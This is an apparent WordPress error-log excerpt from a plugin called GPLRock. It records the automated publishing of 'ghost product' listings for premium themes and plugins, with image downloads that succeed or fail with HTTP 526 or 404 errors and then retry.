/home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-597b3f5a.jpg [07-Apr-2026 10:13:57 UTC] GPLRock: Using pre-downloaded image for product ait-claim-listing: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-597b3f5a.jpg [07-Apr-2026 10:13:57 UTC] GPLRock: Ghost product published with image - Product ID: ait-claim-listing [07-Apr-2026 10:13:59 UTC] GPLRock: Image downloaded successfully for product ait-announcements-bar (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-16b56bef.jpg [07-Apr-2026 10:13:59 UTC] GPLRock: Using pre-downloaded image for product ait-announcements-bar: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-16b56bef.jpg [07-Apr-2026 10:13:59 UTC] GPLRock: Ghost product published with image - Product ID: ait-announcements-bar [07-Apr-2026 10:14:00 UTC] GPLRock: Image downloaded successfully for product yith-woocommerce-dynamic-pricing-and-discounts-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a57fbdcc.jpg [07-Apr-2026 10:14:01 UTC] GPLRock: Using pre-downloaded image for product yith-woocommerce-dynamic-pricing-and-discounts-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a57fbdcc.jpg [07-Apr-2026 10:14:01 UTC] GPLRock: Ghost product published with image - Product ID: yith-woocommerce-dynamic-pricing-and-discounts-premium [07-Apr-2026 10:16:06 UTC] GPLRock: Image downloaded successfully for product melady-creative-blog-magazine-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5e5424d2.webp [07-Apr-2026 10:16:06 UTC] GPLRock: Using pre-downloaded image for product melady-creative-blog-magazine-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5e5424d2.webp [07-Apr-2026 10:16:06 UTC] GPLRock: Ghost product published with image - Product ID: melady-creative-blog-magazine-wordpress-theme [07-Apr-2026 10:16:06 UTC] GPLRock: Image download failed for product koto-artist-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:16:08 UTC] GPLRock: Image download failed for product koto-artist-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:16:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/koto---artist-portfolio-wordpress-theme-23593.webp for product koto-artist-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 10:16:10 UTC] GPLRock: Image download failed for product koto-artist-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:16:12 UTC] GPLRock: Image download failed for product koto-artist-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:16:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/koto---artist-portfolio-wordpress-theme-23593.webp for product koto-artist-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 10:16:15 UTC] GPLRock WARNING: Image download failed for product koto-artist-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/koto---artist-portfolio-wordpress-theme-23593.webp [07-Apr-2026 10:16:15 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: koto-artist-portfolio-wordpress-theme [07-Apr-2026 10:16:15 UTC] GPLRock: Image download failed for product printy-print-shop-design-company-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:16:17 UTC] GPLRock: Image download failed for product printy-print-shop-design-company-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:16:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/printy--print-shop--design-company-wordpress-theme-11055.webp for product printy-print-shop-design-company-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 10:16:19 UTC] GPLRock: Image download failed for product printy-print-shop-design-company-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:16:21 UTC] GPLRock: Image download failed for product printy-print-shop-design-company-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:16:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/printy--print-shop--design-company-wordpress-theme-11055.webp for product printy-print-shop-design-company-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 10:16:23 UTC] GPLRock WARNING: Image download failed for product printy-print-shop-design-company-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/printy--print-shop--design-company-wordpress-theme-11055.webp [07-Apr-2026 10:16:23 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: printy-print-shop-design-company-wordpress-theme [07-Apr-2026 10:16:23 UTC] GPLRock: Image download failed for product centrix-agency-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:16:25 UTC] GPLRock: Image download failed for product centrix-agency-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:16:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/centrix---agency--portfolio-wordpress-theme-3784.webp for product centrix-agency-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 10:16:28 UTC] GPLRock: Image download failed for product centrix-agency-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:16:30 UTC] GPLRock: Image download failed for product centrix-agency-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:16:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/centrix---agency--portfolio-wordpress-theme-3784.webp for product centrix-agency-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 10:16:32 UTC] GPLRock WARNING: Image download failed for product centrix-agency-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/centrix---agency--portfolio-wordpress-theme-3784.webp [07-Apr-2026 10:16:32 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: centrix-agency-portfolio-wordpress-theme [07-Apr-2026 10:16:32 UTC] GPLRock: Image download failed for product revista-flat-magazine-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:16:34 UTC] GPLRock: Image download failed for product revista-flat-magazine-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:16:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/revista---flat-magazine-wordpress-theme-18567.webp for product revista-flat-magazine-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 10:16:36 UTC] GPLRock: Image download failed for product revista-flat-magazine-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:16:38 UTC] GPLRock: Image download failed for product revista-flat-magazine-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:16:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/revista---flat-magazine-wordpress-theme-18567.webp for product revista-flat-magazine-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 10:16:41 UTC] GPLRock WARNING: Image download failed for product revista-flat-magazine-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/revista---flat-magazine-wordpress-theme-18567.webp [07-Apr-2026 10:16:41 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: revista-flat-magazine-wordpress-theme [07-Apr-2026 10:16:41 UTC] GPLRock: Image download failed for product qodify-it-solutions-and-services-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:16:43 UTC] GPLRock: Image download failed for product qodify-it-solutions-and-services-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:16:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/qodify---it-solutions-and-services-wordpress-theme-4710.webp for product qodify-it-solutions-and-services-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 10:16:45 UTC] GPLRock: Image download failed for product qodify-it-solutions-and-services-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:16:47 UTC] GPLRock: Image download failed for product qodify-it-solutions-and-services-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:16:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/qodify---it-solutions-and-services-wordpress-theme-4710.webp for product qodify-it-solutions-and-services-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 10:16:49 UTC] GPLRock WARNING: Image download failed for product qodify-it-solutions-and-services-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/qodify---it-solutions-and-services-wordpress-theme-4710.webp [07-Apr-2026 10:16:49 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: qodify-it-solutions-and-services-wordpress-theme [07-Apr-2026 10:16:49 UTC] GPLRock: Image download failed for product doctreat-hospitals-and-doctors-directory-wordpress-listing-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:16:51 UTC] GPLRock: Image download failed for product doctreat-hospitals-and-doctors-directory-wordpress-listing-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:16:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/doctreat---hospitals-and-doctors-directory-wordpress-listing-theme-9965.webp for product doctreat-hospitals-and-doctors-directory-wordpress-listing-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 10:16:54 UTC] GPLRock: Image download failed for product doctreat-hospitals-and-doctors-directory-wordpress-listing-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:16:56 UTC] GPLRock: Image download failed for product doctreat-hospitals-and-doctors-directory-wordpress-listing-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:16:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/doctreat---hospitals-and-doctors-directory-wordpress-listing-theme-9965.webp for product doctreat-hospitals-and-doctors-directory-wordpress-listing-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 10:16:58 UTC] GPLRock WARNING: Image download failed for product doctreat-hospitals-and-doctors-directory-wordpress-listing-theme. URL: https://meldwp.com/wp-content/uploads/doctreat---hospitals-and-doctors-directory-wordpress-listing-theme-9965.webp [07-Apr-2026 10:16:58 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: doctreat-hospitals-and-doctors-directory-wordpress-listing-theme [07-Apr-2026 10:16:58 UTC] GPLRock: Image downloaded successfully for product techco-it-solutions-business-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b81c8a38.webp [07-Apr-2026 10:16:58 UTC] GPLRock: Using pre-downloaded image for product techco-it-solutions-business-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b81c8a38.webp [07-Apr-2026 10:16:58 UTC] GPLRock: Ghost product published with image - Product ID: techco-it-solutions-business-wordpress-theme [07-Apr-2026 10:16:58 UTC] GPLRock: Image download failed for product helax-tech-startup-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:17:00 UTC] GPLRock: Image download failed for product helax-tech-startup-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:17:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/helax---tech-startup-wordpress-theme-1664.webp for product helax-tech-startup-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 10:17:03 UTC] GPLRock: Image download failed for product helax-tech-startup-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:17:05 UTC] GPLRock: Image download failed for product helax-tech-startup-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:17:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/helax---tech-startup-wordpress-theme-1664.webp for product helax-tech-startup-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 10:17:07 UTC] GPLRock WARNING: Image download failed for product helax-tech-startup-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/helax---tech-startup-wordpress-theme-1664.webp [07-Apr-2026 10:17:07 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: helax-tech-startup-wordpress-theme [07-Apr-2026 10:17:07 UTC] GPLRock: Image download failed for product lanong-yacht-rental-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:17:09 UTC] GPLRock: Image download failed for product lanong-yacht-rental-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:17:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lanong---yacht-rental-wordpress-theme-16234.webp for product lanong-yacht-rental-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 10:17:11 UTC] GPLRock: Image download failed for product lanong-yacht-rental-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:17:13 UTC] GPLRock: Image download failed for product lanong-yacht-rental-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:17:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lanong---yacht-rental-wordpress-theme-16234.webp for product lanong-yacht-rental-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 10:17:15 UTC] GPLRock WARNING: Image download failed for product lanong-yacht-rental-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/lanong---yacht-rental-wordpress-theme-16234.webp [07-Apr-2026 10:17:15 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: lanong-yacht-rental-wordpress-theme [07-Apr-2026 10:17:36 UTC] GPLRock: Image downloaded successfully for product the7-website-and-ecommerce-builder-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4b19d5cc.jpg [07-Apr-2026 10:17:37 UTC] GPLRock: Using pre-downloaded image for product the7-website-and-ecommerce-builder-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4b19d5cc.jpg [07-Apr-2026 10:17:37 UTC] GPLRock: Ghost product published with image - Product ID: the7-website-and-ecommerce-builder-for-wordpress [07-Apr-2026 10:17:38 UTC] GPLRock: Image downloaded successfully for product real-homes-wordpress-real-estate-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-766c451e.jpg [07-Apr-2026 10:17:38 UTC] GPLRock: Using pre-downloaded image for product real-homes-wordpress-real-estate-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-766c451e.jpg [07-Apr-2026 10:17:38 UTC] GPLRock: Ghost product published with image - Product ID: real-homes-wordpress-real-estate-theme [07-Apr-2026 10:17:40 UTC] GPLRock: Image downloaded successfully for product classima-classified-ads-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a8a9313c.jpg [07-Apr-2026 10:17:40 UTC] GPLRock: Using pre-downloaded image for product classima-classified-ads-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a8a9313c.jpg [07-Apr-2026 10:17:40 UTC] GPLRock: Ghost product published with image - Product ID: classima-classified-ads-wordpress-theme [07-Apr-2026 10:17:43 UTC] GPLRock: Image download failed for product lisfinity-classified-ads-wordpress-theme (attempt 1/3). HTTP Code: 404, Error: . Retrying... [07-Apr-2026 10:17:47 UTC] GPLRock: Image download failed for product lisfinity-classified-ads-wordpress-theme (attempt 2/3). HTTP Code: 404, Error: . Retrying... [07-Apr-2026 10:17:52 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2021/04/Lisfinity-Classified-Ads-WordPress-Theme.jpg for product lisfinity-classified-ads-wordpress-theme after 3 attempts. HTTP Code: 404, Error: [07-Apr-2026 10:17:54 UTC] GPLRock: Image download failed for product lisfinity-classified-ads-wordpress-theme (attempt 1/3). HTTP Code: 404, Error: . Retrying... [07-Apr-2026 10:17:58 UTC] GPLRock: Image download failed for product lisfinity-classified-ads-wordpress-theme (attempt 2/3). HTTP Code: 404, Error: . Retrying... [07-Apr-2026 10:18:02 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2021/04/Lisfinity-Classified-Ads-WordPress-Theme.jpg for product lisfinity-classified-ads-wordpress-theme after 3 attempts. HTTP Code: 404, Error: [07-Apr-2026 10:18:02 UTC] GPLRock WARNING: Image download failed for product lisfinity-classified-ads-wordpress-theme. URL: https://www.gplrock.com/wp-content/uploads/2021/04/Lisfinity-Classified-Ads-WordPress-Theme.jpg [07-Apr-2026 10:18:02 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: lisfinity-classified-ads-wordpress-theme [07-Apr-2026 10:18:04 UTC] GPLRock: Image downloaded successfully for product rey-fashion-clothing-furniture (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e3ac6284.jpg [07-Apr-2026 10:18:04 UTC] GPLRock: Using pre-downloaded image for product rey-fashion-clothing-furniture: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e3ac6284.jpg [07-Apr-2026 10:18:04 UTC] GPLRock: Ghost product published with image - Product ID: rey-fashion-clothing-furniture [07-Apr-2026 10:18:05 UTC] GPLRock: Image downloaded successfully for product duplicator-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a2eb76f5.jpg [07-Apr-2026 10:18:05 UTC] GPLRock: Using pre-downloaded image for product duplicator-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a2eb76f5.jpg [07-Apr-2026 10:18:05 UTC] GPLRock: Ghost product published with image - Product ID: duplicator-pro [07-Apr-2026 10:18:06 UTC] GPLRock: Image downloaded successfully for product wp-optimize-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a7033f06.png [07-Apr-2026 10:18:06 UTC] GPLRock: Using pre-downloaded image for product wp-optimize-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a7033f06.png [07-Apr-2026 10:18:06 UTC] GPLRock: Ghost product published with image - Product ID: wp-optimize-premium [07-Apr-2026 10:18:08 UTC] GPLRock: Image downloaded successfully for product chaty-wordpress-chat-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0b82ab94.jpg [07-Apr-2026 10:18:08 UTC] GPLRock: Using pre-downloaded image for product chaty-wordpress-chat-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0b82ab94.jpg [07-Apr-2026 10:18:08 UTC] GPLRock: Ghost product published with image - Product ID: chaty-wordpress-chat-plugin [07-Apr-2026 10:18:10 UTC] GPLRock: Image downloaded successfully for product agency-cynic-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a1fc8bbe.jpg [07-Apr-2026 10:18:10 UTC] GPLRock: Using pre-downloaded image for product agency-cynic-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a1fc8bbe.jpg [07-Apr-2026 10:18:10 UTC] GPLRock: Ghost product published with image - Product ID: agency-cynic-wordpress-theme [07-Apr-2026 10:18:12 UTC] GPLRock: Image downloaded successfully for product newsomatic-automatic-news-post-generator-plugin-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-009ee48a.avif [07-Apr-2026 10:18:12 UTC] GPLRock: Using pre-downloaded image for product newsomatic-automatic-news-post-generator-plugin-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-009ee48a.avif [07-Apr-2026 10:18:12 UTC] GPLRock: Ghost product published with image - Product ID: newsomatic-automatic-news-post-generator-plugin-for-wordpress [07-Apr-2026 10:24:16 UTC] GPLRock: Image download failed for product visual-composer-ultimate-gallery-album (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:24:18 UTC] GPLRock: Image download failed for product visual-composer-ultimate-gallery-album (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:24:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/visual-composer---ultimate-gallery-album-21297.webp for product visual-composer-ultimate-gallery-album after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 10:24:21 UTC] GPLRock: Image download failed for product visual-composer-ultimate-gallery-album (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:24:23 UTC] GPLRock: Image download failed for product visual-composer-ultimate-gallery-album (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:24:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/visual-composer---ultimate-gallery-album-21297.webp for product visual-composer-ultimate-gallery-album after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 10:24:25 UTC] GPLRock WARNING: Image download failed for product visual-composer-ultimate-gallery-album. URL: https://meldwp.com/wp-content/uploads/visual-composer---ultimate-gallery-album-21297.webp [07-Apr-2026 10:24:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: visual-composer-ultimate-gallery-album [07-Apr-2026 10:24:25 UTC] GPLRock: Image download failed for product leopard-wordpress-offload-media (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:24:27 UTC] GPLRock: Image download failed for product leopard-wordpress-offload-media (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:24:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/leopard---wordpress-offload-media-11783.webp for product leopard-wordpress-offload-media after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 10:24:29 UTC] GPLRock: Image download failed for product leopard-wordpress-offload-media (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:24:31 UTC] GPLRock: Image download failed for product leopard-wordpress-offload-media (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:24:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/leopard---wordpress-offload-media-11783.webp for product leopard-wordpress-offload-media after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 10:24:34 UTC] GPLRock WARNING: Image download failed for product leopard-wordpress-offload-media. URL: https://meldwp.com/wp-content/uploads/leopard---wordpress-offload-media-11783.webp [07-Apr-2026 10:24:34 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: leopard-wordpress-offload-media [07-Apr-2026 10:24:34 UTC] GPLRock: Image download failed for product wpbookit-rating-and-review-addon (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:24:36 UTC] GPLRock: Image download failed for product wpbookit-rating-and-review-addon (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:24:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wpbookit---rating-and-review-addon-17964.webp for product wpbookit-rating-and-review-addon after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 10:24:38 UTC] GPLRock: Image download failed for product wpbookit-rating-and-review-addon (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:24:40 UTC] GPLRock: Image download failed for product wpbookit-rating-and-review-addon (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:24:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wpbookit---rating-and-review-addon-17964.webp for product wpbookit-rating-and-review-addon after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 10:24:43 UTC] GPLRock WARNING: Image download failed for product wpbookit-rating-and-review-addon. URL: https://meldwp.com/wp-content/uploads/wpbookit---rating-and-review-addon-17964.webp [07-Apr-2026 10:24:43 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wpbookit-rating-and-review-addon [07-Apr-2026 10:24:43 UTC] GPLRock: Image download failed for product wordpress-tab-plugin-tab-awesome-pro (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:24:45 UTC] GPLRock: Image download failed for product wordpress-tab-plugin-tab-awesome-pro (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:24:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wordpress-tab-plugin---tab-awesome-pro-7354.webp for product wordpress-tab-plugin-tab-awesome-pro after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 10:24:47 UTC] GPLRock: Image download failed for product wordpress-tab-plugin-tab-awesome-pro (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:24:49 UTC] GPLRock: Image download failed for product wordpress-tab-plugin-tab-awesome-pro (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:24:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wordpress-tab-plugin---tab-awesome-pro-7354.webp for product wordpress-tab-plugin-tab-awesome-pro after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 10:24:51 UTC] GPLRock WARNING: Image download failed for product wordpress-tab-plugin-tab-awesome-pro. URL: https://meldwp.com/wp-content/uploads/wordpress-tab-plugin---tab-awesome-pro-7354.webp [07-Apr-2026 10:24:51 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wordpress-tab-plugin-tab-awesome-pro [07-Apr-2026 10:24:51 UTC] GPLRock: Image download failed for product services-infobox-addons-for-wpbakery-page-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:24:53 UTC] GPLRock: Image download failed for product services-infobox-addons-for-wpbakery-page-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:24:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/services--infobox-addons-for-wpbakery-page-builder-3480.webp for product services-infobox-addons-for-wpbakery-page-builder after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 10:24:56 UTC] GPLRock: Image download failed for product services-infobox-addons-for-wpbakery-page-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:24:59 UTC] GPLRock: Image download failed for product services-infobox-addons-for-wpbakery-page-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:25:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/services--infobox-addons-for-wpbakery-page-builder-3480.webp for product services-infobox-addons-for-wpbakery-page-builder after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 10:25:01 UTC] GPLRock WARNING: Image download failed for product services-infobox-addons-for-wpbakery-page-builder. URL: https://meldwp.com/wp-content/uploads/services--infobox-addons-for-wpbakery-page-builder-3480.webp [07-Apr-2026 10:25:01 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: services-infobox-addons-for-wpbakery-page-builder [07-Apr-2026 10:25:01 UTC] GPLRock: Image downloaded successfully for product woocommerce-food-restaurant-menu-food-ordering (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6ea9d07b.webp [07-Apr-2026 10:25:01 UTC] GPLRock: Using pre-downloaded image for product woocommerce-food-restaurant-menu-food-ordering: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6ea9d07b.webp [07-Apr-2026 10:25:01 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-food-restaurant-menu-food-ordering [07-Apr-2026 10:25:01 UTC] GPLRock: Image download failed for product jobclass-job-board-web-application (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:25:03 UTC] GPLRock: Image download failed for product jobclass-job-board-web-application (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:25:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/jobclass---job-board-web-application-33107.webp for product jobclass-job-board-web-application after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 10:25:05 UTC] GPLRock: Image download failed for product jobclass-job-board-web-application (attempt 1/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:25:07 UTC] GPLRock: Image download failed for product jobclass-job-board-web-application (attempt 2/3). HTTP Code: 526, Error: . Retrying... [07-Apr-2026 10:25:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/jobclass---job-board-web-application-33107.webp for product jobclass-job-board-web-application after 3 attempts. HTTP Code: 526, Error: [07-Apr-2026 10:25:09 UTC] GPLRock WARNING: Image download failed for product jobclass-job-board-web-application. URL: https://meldwp.com/wp-content/uploads/jobclass---job-board-web-application-33107.webp [07-Apr-2026 